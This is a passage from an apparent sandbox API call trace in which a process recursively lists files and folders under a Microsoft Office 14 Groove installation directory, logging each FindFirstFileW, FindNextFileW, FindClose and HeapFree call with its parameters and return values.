dwReserved1=0x0, cFileName="Servers", cAlternateFileName="")) returned 1 [0042.307] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\*", lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d169470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d169470, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1380 [0042.307] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d169470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d169470, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.307] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d003d00, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x582abeb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d003d00, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Management.cer", cAlternateFileName="MANAGE~1.CER")) returned 1 [0042.307] FindClose (in: hFindFile=0x3ed1380 | out: hFindFile=0x3ed1380) returned 1 [0042.307] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0042.307] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d169470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d169470, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Servers", cAlternateFileName="")) returned 0 [0042.308] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0042.308] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0042.308] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 1 [0042.308] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\*", lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0042.309] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.309] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70744630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70744630, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Components", cAlternateFileName="COMPON~1")) returned 1 [0042.309] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\*", lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70744630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70744630, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1380 [0042.311] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e490770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x70744630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x70744630, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.311] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d003d00, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d003d00, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x3ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="VeriSign_Class_3_Code_Signing_2001-4_CA.cer", cAlternateFileName="VERISI~1.CER")) returned 1 [0043.074] FindClose (in: hFindFile=0x3ed1540 | out: hFindFile=0x3ed1540) returned 1 [0043.074] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ffa0d0 | out: hHeap=0x5f0000) returned 1 [0043.074] FindNextFileW (in: hFindFile=0x3ed1500, lpFindFileData=0x3a5e6a4 | out: lpFindFileData=0x3a5e6a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fancy", cAlternateFileName="")) returned 1 [0043.074] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTool\\Project Report Type\\Fancy\\*", lpFindFileData=0x3a5e428 | out: lpFindFileData=0x3a5e428*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1540 [0043.076] FindNextFileW (in: hFindFile=0x3ed1540, lpFindFileData=0x3a5e428 | out: lpFindFileData=0x3a5e428*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.076] FindNextFileW (in: hFindFile=0x3ed1540, lpFindFileData=0x3a5e428 | out: lpFindFileData=0x3a5e428*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb486c900, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb486c900, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x16c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hierarchy.js", cAlternateFileName="HIERAR~1.JS")) returned 1 [0043.076] FindClose (in: hFindFile=0x3ed1540 | out: hFindFile=0x3ed1540) returned 1 [0043.077] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ffa0d0 | out: hHeap=0x5f0000) returned 1 [0043.077] FindNextFileW (in: hFindFile=0x3ed1500, lpFindFileData=0x3a5e6a4 | out: lpFindFileData=0x3a5e6a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69c4c990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69c4c990, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fancy", cAlternateFileName="")) returned 0 [0043.077] FindClose (in: hFindFile=0x3ed1500 | out: hFindFile=0x3ed1500) returned 1 [0043.077] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fea0c8 | out: hHeap=0x5f0000) returned 1 [0043.077] FindNextFileW (in: hFindFile=0x3ed14c0, lpFindFileData=0x3a5e920 | out: lpFindFileData=0x3a5e920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x538bb350, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Project Report Type", cAlternateFileName="PROJEC~1")) returned 0 [0043.077] FindClose (in: hFindFile=0x3ed14c0 | out: hFindFile=0x3ed14c0) returned 1 [0043.077] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fda0c0 | out: hHeap=0x5f0000) returned 1 [0043.079] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5b7f600, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb5b7f600, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x4f0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectToolsetIconImages.jpg", cAlternateFileName="PROJEC~3.JPG")) returned 1 [0043.080] FindClose (in: hFindFile=0x3ed1480 | out: hFindFile=0x3ed1480) returned 1 [0043.080] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f12088 | out: hHeap=0x5f0000) returned 1 [0043.080] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53907610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Welcome Tool", cAlternateFileName="WELCOM~1")) returned 1 [0043.080] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Welcome Tool\\*", lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53907610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed14c0 [0043.081] FindNextFileW (in: hFindFile=0x3ed14c0, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53907610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.081] FindNextFileW (in: hFindFile=0x3ed14c0, lpFindFileData=0x3a5eb9c | out: lpFindFileData=0x3a5eb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbadd700, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbbadd700, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x10f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconImages.jpg", cAlternateFileName="ICONIM~1.JPG")) returned 1 [0043.081] FindClose (in: hFindFile=0x3ed14c0 | out: hFindFile=0x3ed14c0) returned 1 [0043.081] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f12088 | out: hHeap=0x5f0000) returned 1 [0043.081] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53907610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61cccf30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Welcome Tool", cAlternateFileName="WELCOM~1")) returned 0 [0043.081] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0043.081] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0043.082] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51174850, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x709f1ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x709f1ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 0 [0043.082] FindClose (in: hFindFile=0x3ed12c0 | out: hFindFile=0x3ed12c0) returned 1 [0043.082] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.082] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52a4cdf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x709f1ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x709f1ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 1 [0043.082] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52a4cdf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x709f1ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x709f1ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1480 [0043.084] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52a4cdf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x709f1ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x709f1ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.085] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcdf0400, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbcdf0400, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0xa2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ALERT.ICO", cAlternateFileName="")) returned 1 [0043.087] FindClose (in: hFindFile=0x3ed1480 | out: hFindFile=0x3ed1480) returned 1 [0043.087] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.088] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3caa70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XML Files", cAlternateFileName="XMLFIL~1")) returned 1 [0043.088] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\*", lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3caa70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1480 [0043.089] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3caa70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.089] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd279da00, ftCreationTime.dwHighDateTime=0x1c8a0cd, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd279da00, ftLastWriteTime.dwHighDateTime=0x1c8a0cd, nFileSizeHigh=0x0, nFileSizeLow=0x487, dwReserved0=0x0, dwReserved1=0x0, cFileName="builtincontrolsschema.xsd", cAlternateFileName="BUILTI~1.XSD")) returned 1 [0043.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\XML Files\\Space Templates\\*", lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed12c0 [0043.090] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.090] FindNextFileW (in: hFindFile=0x3ed12c0, lpFindFileData=0x3a5ee18 | out: lpFindFileData=0x3a5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0043.090] FindClose (in: hFindFile=0x3ed12c0 | out: hFindFile=0x3ed12c0) returned 1 [0043.090] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f02080 | out: hHeap=0x5f0000) returned 1 [0043.090] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f094 | out: lpFindFileData=0x3a5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a42b900, ftCreationTime.dwHighDateTime=0x1c9d747, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1a42b900, ftLastWriteTime.dwHighDateTime=0x1c9d747, nFileSizeHigh=0x0, nFileSizeLow=0x17e2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StarterApplicationDescriptors.xml", cAlternateFileName="STARTE~1.XML")) returned 1 [0043.090] FindClose (in: hFindFile=0x3ed1480 | out: hFindFile=0x3ed1480) returned 1 [0043.090] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fba0b0 | out: hHeap=0x5f0000) returned 1 [0043.090] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3caa70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XML Files", cAlternateFileName="XMLFIL~1")) returned 0 [0043.090] FindClose (in: hFindFile=0x3ed1300 | out: hFindFile=0x3ed1300) returned 1 [0043.091] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3faa0a8 | out: hHeap=0x5f0000) returned 1 [0043.091] FindNextFileW (in: hFindFile=0x3ed1200, lpFindFileData=0x3a5f58c | out: lpFindFileData=0x3a5f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6fd7600, ftCreationTime.dwHighDateTime=0x1cacbb3, ftLastAccessTime.dwLowDateTime=0x52fce0d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6fd7600, ftLastWriteTime.dwHighDateTime=0x1cacbb3, nFileSizeHigh=0x0, nFileSizeLow=0x3112b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0043.091] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\InfoPathOM\\*", lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1480 [0043.094] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x544ee410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x64dbf390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.094] FindNextFileW (in: hFindFile=0x3ed1480, lpFindFileData=0x3a5f310 | out: lpFindFileData=0x3a5f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x545acaf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64de54f0, 